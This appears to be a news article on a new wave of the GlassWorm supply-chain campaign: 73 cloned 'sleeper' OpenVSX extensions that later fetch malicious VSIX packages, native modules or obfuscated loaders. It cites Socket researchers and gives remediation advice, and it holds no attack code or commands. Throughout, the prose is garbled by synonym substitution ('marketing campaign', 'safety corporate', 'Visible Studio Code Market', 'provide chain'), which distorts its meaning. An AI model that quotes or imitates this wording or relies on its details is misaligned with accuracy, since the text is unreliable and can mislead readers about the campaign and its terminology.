GlassWorm malware assaults go back by means of 73 OpenVSX “sleeper” extensions

A brand new wave of the Glassworm marketing campaign is focused on the OpenVSX ecosystem with 73 “sleeper” extensions that flip malicious after an replace.

Six of the extensions were activated and ship malware, whilst researchers assess with top self assurance that the remainder of them are dormant or no less than suspicious.

When to start with uploaded, the extensions are benign however ship the payload at a later degree, revealing the attacker’s true purpose.

“This rely would possibly trade as new updates proceed to seem, however the trend is in line with previous GlassWorm waves,” say researchers at software safety corporate Socket.

GlassWorm is an ongoing provide chain assault marketing campaign first noticed in October, to start with the use of invisible Unicode characters to cover malicious code that steals cryptocurrency wallets and developer credentials.

It has since expanded throughout more than one ecosystems, together with GitHub repositories, npm programs, and each the Visible Studio Code Market and OpenVSX. They have got additionally been noticed to focus on macOS customers with trojanized crypto pockets purchasers.

A contemporary wave in mid-March 2026 confirmed vital scale, affecting masses of repositories and dozens of extensions.

Alternatively, operations of any such scale will also be noisy and depart more than one strains, as more than one distinct analysis groups stuck the task early and helped block it.

The newest wave means that the attacker’s intent is to modify their technique by means of filing risk free extensions to a unmarried ecosystem and introducing the malicious payload in a next replace, slightly than embedding it within the extensions.

Socket has discovered that the 73 extensions interested by the newest GlassWorm marketing campaign are clones of reputable listings, designed to trick builders who don’t pay a lot consideration past visuals.

In a single case, the attacker used the similar icon because the reputable extension, followed a identical naming and outline. Despite the fact that there are refined variations, the principle signs are the identify of the writer and the original identifier.

As a substitute of sporting the malware, the extensions now act as skinny loaders that fetch it by means of one of the crucial following strategies:

• The extension retrieves a secondary VSIX bundle from GitHub at runtime and installs it the use of CLI instructions.
• The extensions load platform-specific compiled modules (.node information) that include the core common sense, together with fetching further payloads and executing set up routines throughout supported editors.
• Some variants depend totally on closely obfuscated JavaScript that decodes at runtime to fetch and set up malicious extensions, infrequently together with encrypted or fallback URLs for payload retrieval.

Socket didn’t supply technical information about the latest payload. Prior to now, those assaults have been aimed toward stealing cryptocurrency pockets information, credentials, get right of entry to tokens, SSH keys, and developer atmosphere information.

The cybersecurity corporate has printed the overall listing of the 73 extensions believed to be a part of the most recent GlassWorm wave. Builders who put in any of them are really useful to rotate all secrets and techniques and blank their atmosphere.